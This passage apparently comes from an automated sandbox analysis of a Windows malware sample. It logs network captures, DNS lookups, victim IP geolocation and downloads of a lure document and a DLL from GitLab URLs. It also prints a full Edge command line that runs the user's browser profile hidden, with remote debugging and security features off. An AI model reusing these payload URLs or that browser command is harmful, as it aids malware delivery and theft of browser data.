                                                                                                                                                                                    Jan 14, 2025 13:13:12.661715984 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.661744118 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.661750078 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.661777020 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662081003 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662098885 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662131071 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662137032 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662151098 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662307024 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662327051 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662344933 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662357092 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.662379980 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.667503119 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.742887974 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.742911100 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.742996931 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743005037 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743046999 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743367910 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743387938 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743431091 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743437052 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743459940 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743484974 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743772984 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743793964 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743823051 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743829012 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743853092 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.743869066 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750385046 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750406027 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750473022 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750482082 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750498056 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750514984 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750813961 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750833988 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750889063 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750895023 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.750932932 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751305103 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751332045 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751369953 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751375914 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751391888 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751408100 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751717091 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751745939 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751768112 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751775026 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751795053 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.751811981 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.752048016 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.752074957 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.752110958 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.752115965 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.752135992 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.752149105 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831268072 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831301928 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831418991 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831434965 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831479073 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831691027 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831712961 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831790924 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831790924 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831799030 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.831840038 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.832026005 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.832048893 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.832076073 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.832082033 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.832113981 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.832125902 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839090109 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839109898 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839174032 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839179993 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839220047 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839236975 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839566946 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839598894 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839623928 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839628935 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839657068 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839672089 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839875937 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839916945 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839929104 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839936018 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.839956999 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.840257883 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.840277910 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.840306997 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.840317011 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.840341091 CET50003443192.168.2.11172.65.251.78
                                                                                                                                                                                    Jan 14, 2025 13:13:12.840607882 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.840626955 CET44350003172.65.251.78192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:12.840660095 CET50003443192.168.2.11172.65.251.78
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2025 13:12:20.564361095 CET | 51202 | 53 | 192.168.2.11 | 1.1.1.1
Jan 14, 2025 13:12:20.571464062 CET | 53 | 51202 | 1.1.1.1 | 192.168.2.11
Jan 14, 2025 13:13:13.538085938 CET | 53003 | 53 | 192.168.2.11 | 1.1.1.1
Jan 14, 2025 13:13:13.544975996 CET | 53 | 53003 | 1.1.1.1 | 192.168.2.11
Jan 14, 2025 13:13:14.783041954 CET | 57653 | 53 | 192.168.2.11 | 1.1.1.1
Jan 14, 2025 13:13:14.790379047 CET | 53 | 57653 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 14, 2025 13:12:20.564361095 CET | 192.168.2.11 | 1.1.1.1 | 0xed29 | Standard query (0) | gitlab.com | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:13:13.538085938 CET | 192.168.2.11 | 1.1.1.1 | 0xd502 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:13:14.783041954 CET | 192.168.2.11 | 1.1.1.1 | 0xae77 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 14, 2025 13:12:17.346561909 CET | 1.1.1.1 | 192.168.2.11 | 0xa193 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 13:12:17.346561909 CET | 1.1.1.1 | 192.168.2.11 | 0xa193 | No error (0) | s-part-0017.t-0009.t-msedge.net |  | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:12:20.571464062 CET | 1.1.1.1 | 192.168.2.11 | 0xed29 | No error (0) | gitlab.com |  | 172.65.251.78 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:12:28.073024988 CET | 1.1.1.1 | 192.168.2.11 | 0xdc54 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:12:28.073024988 CET | 1.1.1.1 | 192.168.2.11 | 0xdc54 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:13:13.544975996 CET | 1.1.1.1 | 192.168.2.11 | 0xd502 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:13:13.544975996 CET | 1.1.1.1 | 192.168.2.11 | 0xd502 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:13:13.544975996 CET | 1.1.1.1 | 192.168.2.11 | 0xd502 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 13:13:14.790379047 CET | 1.1.1.1 | 192.168.2.11 | 0xae77 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                    • gitlab.com
                                                                                                                                                                                    • api.ipify.org
                                                                                                                                                                                    • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 50007 | 208.95.112.1 | 80 | 7760 | C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 13:13:14.798335075 CET | 53 | OUT | GET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                    Host: ip-api.com
Jan 14, 2025 13:13:15.272903919 CET | 483 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:15 GMT
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Content-Length: 306
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 50010 | 208.95.112.1 | 80 | 7760 | C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 13:13:16.576643944 CET | 53 | OUT | GET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                    Host: ip-api.com
Jan 14, 2025 13:13:17.029232025 CET | 483 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:16 GMT
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Content-Length: 306
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    X-Ttl: 58
                                                                                                                                                                                    X-Rl: 43
                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49722 | 172.65.251.78 | 443 | 7760 | C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 12:12:21 UTC | 107 | OUT | GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1
                                                                                                                                                                                    Host: gitlab.com
2025-01-14 12:12:21 UTC | 537 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:12:21 GMT
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Content-Length: 16036
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    CF-Ray: 901d88a8aadc43a3-EWR
                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Age: 60
                                                                                                                                                                                    Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                    Content-Disposition: attachment; filename="Your_Benefits_and_Role.docx"; filename*=UTF-8''Your_Benefits_and_Role.docx
                                                                                                                                                                                    ETag: "c9f854e67f415052529ad6dc8e14658c"
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
2025-01-14 12:12:21 UTC | 2134 | IN | Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
2025-01-14 12:12:21 UTC | 500 | IN | Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkQw2Ti7xqy7DeNW7hum3CunIjez%2BnjYDvP9T4XLB46elFfXMcEztrQdOp8TxX9JdeSVJ1YwRklUGCDUVstOtpsFik321frRkNpLk%2B49Qvgpx%2Fc2gqy61szssG0%3D"}],"group":"cf-nel","max_age":604800}
NEL:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 50003 | 172.65.251.78 | 443 | 7760 | C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 12:13:11 UTC | 127 | OUT | GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1
                                                                                                                                                                                    Host: gitlab.com
                                                                                                                                                                                    2025-01-14 12:13:11 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:11 GMT
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Content-Length: 1780736
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    CF-Ray: 901d89e1efaa4297-EWR
                                                                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Cache-Control: max-age=3600, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                    Content-Disposition: attachment; filename="e_sqlite3.dll"; filename*=UTF-8''e_sqlite3.dll
                                                                                                                                                                                    ETag: "fc529fb92be2696af6fda5021785be60"
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    2025-01-14 12:13:11 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                    Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                    2025-01-14 12:13:11 UTC500INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 50 75 74 6b 31 35 30 44 4d 76 52 70 4a 43 37 61 53 36 4b 32 68 4a 77 67 33 48 55 41 42 7a 56 7a 47 76 35 73 6e 30 7a 36 74 57 25 32 46 30 4d 35 7a 71 69 77 68 71 4a 58 42 31 6e 30 34 6f 5a 77 44 62 35 52 46 30 75 39 59 72 46 66 64 35 4c 4f 49 69 34 63 41 75 25 32 46 45 66 61 77 78 51 46 6e 58 73 7a 58 76 67 38 77 6a 33 46 77 37 6c 65 45 43 53 63 4a 4b 4b 45 33 25 32 46 75 62 34 36 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Putk150DMvRpJC7aS6K2hJwg3HUABzVzGv5sn0z6tW%2F0M5zqiwhqJXB1n04oZwDb5RF0u9YrFfd5LOIi4cAu%2FEfawxQFnXszXvg8wj3Fw7leECScJKKE3%2Fub46U%3D"}],"group":"cf-nel","max_age":604800}NEL:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 50005 | 104.26.12.205 | 443 | 7760 | C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 12:13:14 UTC | 39 | OUT | GET / HTTP/1.1
Host: api.ipify.org
2025-01-14 12:13:14 UTC | 423 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 12:13:14 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 901d89f33b88efa3-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1852&rtt_var=926&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4176&recv_bytes=677&delivery_rate=303850&cwnd=135&unsent_bytes=0&cid=55b54e20df563dd5&ts=149&x=0"
2025-01-14 12:13:14 UTC | 12 | IN | 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 50006 | 104.26.12.205 | 443 | 7760 | C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 12:13:14 UTC | 39 | OUT | GET / HTTP/1.1
Host: api.ipify.org
2025-01-14 12:13:14 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 12:13:14 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 901d89f708f342f8-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1726&rtt_var=668&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1612368&cwnd=234&unsent_bytes=0&cid=7baf33b5324e2e2c&ts=150&x=0"
2025-01-14 12:13:14 UTC | 12 | IN | 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 50008 | 104.26.12.205 | 443 | 7760 | C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 12:13:15 UTC | 39 | OUT | GET / HTTP/1.1
Host: api.ipify.org
2025-01-14 12:13:15 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 12:13:15 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 901d89fe796a7cf3-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1788&rtt_var=682&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1591280&cwnd=218&unsent_bytes=0&cid=e29c6cbcf9841f26&ts=146&x=0"
2025-01-14 12:13:15 UTC | 12 | IN | 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.11 | 50009 | 104.26.12.205 | 443 | 7760 | C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 12:13:16 UTC | 39 | OUT | GET / HTTP/1.1
Host: api.ipify.org
2025-01-14 12:13:16 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 12:13:16 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 901d8a022d5bf5f8-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1586&rtt_var=603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1801357&cwnd=122&unsent_bytes=0&cid=16d0a33186e05cba&ts=144&x=0"
2025-01-14 12:13:16 UTC | 12 | IN | 8.46.123.189


Target ID:0
Start time:07:12:19
Start date:14/01/2025
Path:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\hJ1bl8p7dJ.exe"
Imagebase:0x7ff7d2190000
File size:26'345'984 bytes
MD5 hash:73D8502F47E5C7B9B4851EE47692105C
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:07:12:19
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                    Start time:07:12:20
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                    Start time:07:12:20
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
